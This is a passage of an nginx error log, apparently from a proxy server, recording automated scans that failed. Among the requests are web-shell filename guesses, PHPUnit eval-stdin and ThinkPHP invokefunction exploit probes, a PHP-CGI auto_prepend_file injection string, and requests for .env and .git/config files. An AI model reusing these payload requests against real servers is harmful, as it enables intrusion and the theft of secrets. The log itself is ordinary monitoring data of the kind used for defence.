/pow.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:40 [error] 213#213: *4327 open() "/var/www/html/dop.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /dop.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:41 [error] 213#213: *4327 "/var/www/html/wp-content/plugins/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:41 [error] 213#213: *4327 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:41 [error] 213#213: *4327 open() "/var/www/html/MTOS/byp.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /MTOS/byp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:41 [error] 213#213: *4327 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/assets/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:41 [error] 213#213: *4327 open() "/var/www/html/wp-includes/customize/index.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/customize/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:42 [error] 213#213: *4327 open() "/var/www/html/pkmoj.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /pkmoj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:42 [error] 213#213: *4327 open() "/var/www/html/uploads/upload2.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /uploads/upload2.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:42 [error] 213#213: *4327 open() "/var/www/html/hehehehe.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /hehehehe.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:42 [error] 213#213: *4327 open() "/var/www/html/fss.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /fss.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:42 [error] 213#213: *4327 open() "/var/www/html/wwr.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wwr.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:43 [error] 213#213: *4327 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:43 [error] 213#213: *4327 open() "/var/www/html/wp-content/kj.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-content/kj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:43 [error] 213#213: *4327 open() "/var/www/html/update/wpupex.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /update/wpupex.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:43 [error] 213#213: *4327 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //install.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:43 [error] 213#213: *4327 open() "/var/www/html/kopyw.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /kopyw.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:43 [error] 213#213: *4327 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:44 [error] 213#213: *4327 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:44 [error] 213#213: *4327 open() "/var/www/html/shop.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /shop.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:44 [error] 213#213: *4327 open() "/var/www/html/lla.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /lla.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:44 [error] 213#213: *4327 open() "/var/www/html/nok.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /nok.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:44 [error] 213#213: *4327 open() "/var/www/html/wp-content/uploads/2024/dodo.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-content/uploads/2024/dodo.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:45 [error] 213#213: *4327 open() "/var/www/html/ker.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ker.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:45 [error] 213#213: *4327 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //dropdown.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:45 [error] 213#213: *4327 open() "/var/www/html/wp-includes/images/403.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/403.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:45 [error] 213#213: *4327 open() "/var/www/html/~elliotimformatiq/sxp.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /~elliotimformatiq/sxp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:45 [error] 213#213: *4327 open() "/var/www/html/qfvqu.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /qfvqu.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:46 [error] 213#213: *4327 open() "/var/www/html/crt.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /crt.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:46 [error] 213#213: *4327 open() "/var/www/html/2eaa2.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /2eaa2.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:46 [error] 213#213: *4327 "/var/www/html/wp-includes/css/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/css/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:46 [error] 213#213: *4327 open() "/var/www/html/has.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /has.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:46 [error] 213#213: *4327 open() "/var/www/html/nka.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /nka.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:47 [error] 213#213: *4327 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:47 [error] 213#213: *4327 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:47 [error] 213#213: *4327 open() "/var/www/html/wp-includes/Text/wp-login.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/Text/wp-login.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:47 [error] 213#213: *4327 open() "/var/www/html/cgi-bin/wp-login.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //cgi-bin/wp-login.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:47 [error] 213#213: *4327 open() "/var/www/html/jvcpa.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /jvcpa.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:48 [error] 213#213: *4327 open() "/var/www/html/zil.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /zil.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:48 [error] 213#213: *4327 open() "/var/www/html/images/uploadform.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /images/uploadform.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:48 [error] 213#213: *4327 open() "/var/www/html/system_log.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /system_log.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:48 [error] 213#213: *4327 open() "/var/www/html/wordpress/clo.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wordpress/clo.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:48 [error] 213#213: *4327 open() "/var/www/html/.well-known/zip.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /.well-known/zip.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:49 [error] 213#213: *4327 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:49 [error] 213#213: *4327 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:49 [error] 213#213: *4327 open() "/var/www/html/wordpress/yts.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wordpress/yts.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:49 [error] 213#213: *4327 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:49 [error] 213#213: *4327 open() "/var/www/html/wp-admin/images/Mhbgf.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/Mhbgf.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:49 [error] 213#213: *4327 "/var/www/html/wp-admin/maint/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:50 [error] 213#213: *4327 open() "/var/www/html/first.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /first.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:50 [error] 213#213: *4327 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //admin/function.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:50 [error] 213#213: *4327 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:50 [error] 213#213: *4327 open() "/var/www/html/wp/wp-includes/index.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes//index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:50 [error] 213#213: *4327 open() "/var/www/html/museu/yhweq.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /museu/yhweq.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:21:15 [error] 213#213: *4331 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:28:41 [error] 213#213: *4332 open() "/var/www/html/.env" failed (2: No such file or directory), client: 164.90.145.163, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/12 08:28:41 [error] 213#213: *4333 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 164.90.145.163, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/12 08:51:00 [error] 213#213: *4365 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 13.89.124.218, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "92.249.249.197" +2026/01/12 08:55:13 [error] 210#210: *4368 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:14 [error] 210#210: *4368 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:14 [error] 210#210: *4368 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:15 [error] 210#210: *4368 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:15 [error] 210#210: *4368 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:15 [error] 210#210: *4368 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:15 [error] 210#210: *4368 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:15 [error] 210#210: *4368 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:16 [error] 210#210: *4368 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:16 [error] 210#210: *4368 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:16 [error] 210#210: *4368 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:16 [error] 210#210: *4368 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:16 [error] 210#210: *4368 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:17 [error] 210#210: *4368 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:17 [error] 210#210: *4368 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:17 [error] 210#210: *4368 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:17 [error] 210#210: *4368 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:18 [error] 210#210: *4368 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:18 [error] 210#210: *4368 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:18 [error] 210#210: *4368 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:18 [error] 210#210: *4368 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:19 [error] 210#210: *4368 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:19 [error] 210#210: *4368 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:19 [error] 210#210: *4368 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:20 [error] 210#210: *4368 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:20 [error] 210#210: *4368 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:20 [error] 210#210: *4368 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:21 [error] 210#210: *4368 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:21 [error] 210#210: *4368 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:21 [error] 210#210: *4368 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:21 [error] 210#210: *4368 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:22 [error] 210#210: *4368 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:22 [error] 210#210: *4368 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:22 [error] 210#210: *4368 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:22 [error] 210#210: *4368 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:23 [error] 210#210: *4368 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:23 [error] 210#210: *4368 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:23 [error] 210#210: *4368 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:23 [error] 210#210: *4368 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:24 [error] 210#210: *4368 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 08:55:25 [error] 210#210: *4368 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 87.98.188.238, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 09:01:59 [error] 210#210: *4369 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 10:18:55 [error] 210#210: *4395 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.178.110.190, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/12 10:21:08 [error] 210#210: *4397 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.178.110.190, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/12 11:17:56 [error] 217#217: *4432 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 11:43:10 [error] 217#217: *4450 open() "/var/www/html/invoker/EJBInvokerServlet" failed (2: No such file or directory), client: 173.197.14.231, server: localhost-nginx-proxy-manager, request: "HEAD /invoker/EJBInvokerServlet HTTP/1.1", host: "92.249.249.197" +2026/01/12 11:43:10 [error] 217#217: *4451 open() "/var/www/html/jmx-console/HtmlAdaptor" failed (2: No such file or directory), client: 173.197.14.231, server: localhost-nginx-proxy-manager, request: "HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1", host: "92.249.249.197" +2026/01/12 11:43:11 [error] 217#217: *4452 open() "/var/www/html/invoker/JMXInvokerServlet" failed (2: No such file or directory), client: 173.197.14.231, server: localhost-nginx-proxy-manager, request: "HEAD /invoker/JMXInvokerServlet HTTP/1.1", host: "92.249.249.197" +2026/01/12 11:43:12 [error] 